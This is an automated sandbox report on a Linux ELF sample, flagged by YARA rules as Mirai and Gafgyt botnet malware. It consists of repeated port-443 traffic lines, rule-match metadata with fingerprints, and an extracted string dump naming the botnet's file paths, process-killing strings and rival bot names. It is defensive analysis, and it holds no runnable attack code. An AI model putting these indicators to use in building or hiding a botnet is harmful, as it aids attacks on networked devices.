      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
      Source: unknownNetwork traffic detected: HTTP traffic on port 40204 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39516
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
      Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39518
      Source: unknownNetwork traffic detected: HTTP traffic on port 53766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40502
      Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40506
      Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
      Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41832
      Source: unknownNetwork traffic detected: HTTP traffic on port 41902 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50620 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52548
      Source: unknownNetwork traffic detected: HTTP traffic on port 39816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52542
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
      Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52540
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39512
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52546
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39514
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41826
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39504
      Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39506
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
      Source: unknownNetwork traffic detected: HTTP traffic on port 57288 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 36780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39508
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41824
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41820
      Source: unknownNetwork traffic detected: HTTP traffic on port 39456 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
      Source: unknownNetwork traffic detected: HTTP traffic on port 40854 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
      Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37202 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40570
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39580
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38252
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39582
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38254
      Source: unknownNetwork traffic detected: HTTP traffic on port 55502 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49618 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38256
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39586
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
      Source: unknownNetwork traffic detected: HTTP traffic on port 46582 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39588
      Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 48150 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40568
      Source: unknownNetwork traffic detected: HTTP traffic on port 38106 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40562
      Source: unknownNetwork traffic detected: HTTP traffic on port 47486 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40560
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41898
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40566
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40564
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53814
      Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39572
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39574
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38244
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39578
      Source: unknownNetwork traffic detected: HTTP traffic on port 45244 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
      Source: unknownNetwork traffic detected: HTTP traffic on port 35082 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40558
      Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
      Source: unknownNetwork traffic detected: HTTP traffic on port 39444 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40552
      Source: unknownNetwork traffic detected: HTTP traffic on port 41758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41884
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40550
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40556
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41880
      Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40554
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41882
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
      Source: unknownNetwork traffic detected: HTTP traffic on port 35094 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
      Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38230
      Source: unknownNetwork traffic detected: HTTP traffic on port 36792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39560
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39562
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39566
      Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
      Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39568
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40548
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38228
      Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 39828 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40546
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
      Source: unknownNetwork traffic detected: HTTP traffic on port 45712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40540
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
      Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41870
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40544
      Source: unknownNetwork traffic detected: HTTP traffic on port 49606 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40542
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
      Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 38118 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
      Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52508
      Source: unknownNetwork traffic detected: HTTP traffic on port 39432 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
      Source: unknownNetwork traffic detected: HTTP traffic on port 33704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38222
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52502
      Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39558
      Source: unknownNetwork traffic detected: HTTP traffic on port 47498 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52500
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40538
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38218
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39548
      Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40530
      Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 36538 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 45256 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40534
      Source: unknownNetwork traffic detected: HTTP traffic on port 41108 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40532
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
      Source: unknownNetwork traffic detected: HTTP traffic on port 51536 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 43302 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38170
      Source: unknownNetwork traffic detected: HTTP traffic on port 40036 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40492
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40490
      Source: unknownNetwork traffic detected: HTTP traffic on port 44376 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52474
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
      Source: unknownNetwork traffic detected: HTTP traffic on port 59878 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
      Source: unknownNetwork traffic detected: HTTP traffic on port 47642 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52478
      Source: unknownNetwork traffic detected: HTTP traffic on port 56864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51176 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52480
      Source: unknownNetwork traffic detected: HTTP traffic on port 36514 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
      Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40486
      Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40484
      Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 35922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40488
      Source: unknownNetwork traffic detected: HTTP traffic on port 51164 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 34562 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39490
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38162
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39492
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38164
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40480
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39494
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52486
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39496
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
      Source: unknownNetwork traffic detected: HTTP traffic on port 33236 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52484
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52490
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52494
      Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
      Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52492
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40474
      Source: unknownNetwork traffic detected: HTTP traffic on port 46798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55034 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40472
      Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40048 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40478
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40476
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39480
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39482
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
      Source: unknownNetwork traffic detected: HTTP traffic on port 55046 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39484
      Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38152
      Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39486
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39488
      Source: unknownNetwork traffic detected: HTTP traffic on port 35934 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
      Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52496
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
      Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
      Source: unknownNetwork traffic detected: HTTP traffic on port 59854 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
      Source: unknownNetwork traffic detected: HTTP traffic on port 44388 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40464
      Source: unknownNetwork traffic detected: HTTP traffic on port 33728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40462
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
      Source: unknownNetwork traffic detected: HTTP traffic on port 41386 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40468
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40466
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
      Source: unknownNetwork traffic detected: HTTP traffic on port 56852 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40494 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 45700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38140
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40460
      Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38142
      Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39472
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38144
      Source: unknownNetwork traffic detected: HTTP traffic on port 33982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38146
      Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39476
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
      Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38148
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39478
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
      Source: unknownNetwork traffic detected: HTTP traffic on port 34574 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40458
      Source: unknownNetwork traffic detected: HTTP traffic on port 49066 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
      Source: unknownNetwork traffic detected: HTTP traffic on port 46786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 34116 -> 443

      System Summary

      barindex
      Source: QvyiI8SFTm.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: QvyiI8SFTm.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: QvyiI8SFTm.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
      Source: QvyiI8SFTm.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: QvyiI8SFTm.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: QvyiI8SFTm.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: QvyiI8SFTm.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Source: 6256.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: 6256.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: 6256.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
      Source: 6256.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: 6256.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: 6256.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: 6256.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Source: Process Memory Space: QvyiI8SFTm.elf PID: 6256, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: Initial sampleString containing 'busybox' found: /bin/busybox
      Source: Initial sampleString containing 'busybox' found: Failed to kill processError opening /proc directory/proc/%d/exe/proc/%s/statusName:%s/bin/busybox/bin/systemd/usr/bintest/tmp/condi/tmp/zxcr9999/tmp/condinetwork/var/condibot/var/zxcr9999/var/CondiBot/var/condinet/bin/watchdogniugaboatnetSSHrobbinkreborcodssh.vegasecMozimoziCutieWTFOhshitdeletedbotnetdvrHelper.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc.
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: QvyiI8SFTm.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: QvyiI8SFTm.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: QvyiI8SFTm.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
      Source: QvyiI8SFTm.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: QvyiI8SFTm.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
      Source: QvyiI8SFTm.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: QvyiI8SFTm.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
      Source: 6256.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: 6256.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: 6256.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
      Source: 6256.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: 6256.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
